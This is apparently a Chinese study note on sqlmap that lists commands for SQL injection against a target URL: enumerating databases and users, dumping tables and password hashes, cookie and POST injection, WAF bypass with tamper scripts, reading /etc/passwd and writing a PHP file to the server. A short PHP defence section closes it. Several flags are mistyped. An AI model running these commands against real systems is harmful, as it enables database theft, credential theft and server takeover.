手记

sqlmap的使用(检测SQL注入的漏洞)以及防护SQL注入

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。它由Python语言开发而成,因此运行需要安装python2.7环境。
  1. 常用注入:
    python sqlmap.py -u 地址 可以查看是否能对当前URL进行注入
    python sqlmap.py -u 地址 -v 1 --dbs // 列举数据库列表
    python sqlmap.py -u 地址 -v 1 --current-db// 显示当前数据库
    python sqlmap.py -u 地址 -v 1 --users // 列举所有数据库用户
    python sqlmap.py -u 地址 -v 1 --current-user // 显示当前用户
    python sqlmap.py -u 地址 -v 1 -D "database_name" --tables // 列举databas的所有表
    python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" --columns // 列举所有字段
    python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" -C"columns1,columns2" –dump //导出相关字段
    而且SQLMAP会将数据存储在sqlmap/output/

  2. post注入:
    先用抓包工具把post的内容拷贝到文件里面去,命名为post.txt
    python sqlmap.py -r post.txt -p "user_name,pass"
    -r 是指定post请求的文件
    -p 是注入需要提交的参数
    也可以利用下面的方式进行post注入
    python sqlmap.py -u 地址 --forms //自动判断注入
    python sqlmap.py -u 地址 --data "指定参数"

3.cookie注入:
如果POST跟GET请求注入都失败的话,可以尝试cookie注入试下。当使用–level 参数>=2的时候sqlmap会检查cookie的参数,先将cookie的信息从请求中复制下来
python sqlmap.py -u 地址 --cookie "参数" --tables --level 2

4.绕过waf防火墙:
假设我们在注入相关地址的时候碰到防火墙可以利用如下方式绕过防火墙
python sqlmap.py -u 地址 -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
在sqlmap 的 tamper目录下有很多py 编码脚本自行加载

5.下面是几个常用实例:
1.读取数据库版本,当前用户,当前数据库
python sqlmap -u 地址 -f -b –current-user –current-db -v 1
2.判断当前数据库用户权限
python sqlmap -u 地址 –privileges -U 用户名 -v 1
python sqlmap -u 地址 –is-dba -U 用户名 -v 1
3.读取所有数据库用户或指定数据库用户的密码
python sqlmap -u 地址 –users –passwords -v 2
python sqlmap -u 地址 –passwords -U root -v 2
4.file-read读取web文件
python sqlmap -u 地址 –file-read “/etc/passwd” -v 2
5.file-write写入文件到web
python sqlmap -u 地址 –file-write /localhost/mm.php –file-dest

那么我们如何对SQL注入进行防护呢(这边是针对PHP的)
如果数据库驱动支持PDO或者mysqli的话可以使用绑定参数的方式来直接避免SQL注入
如果数据库驱动只支持mysql的话字符串可以使用mysql_real_escape_string来过滤,如果为其他类型的话直接强制转化(如int)这样就能避免大部分SQL注入。

3人推荐
随时随地看视频
慕课网APP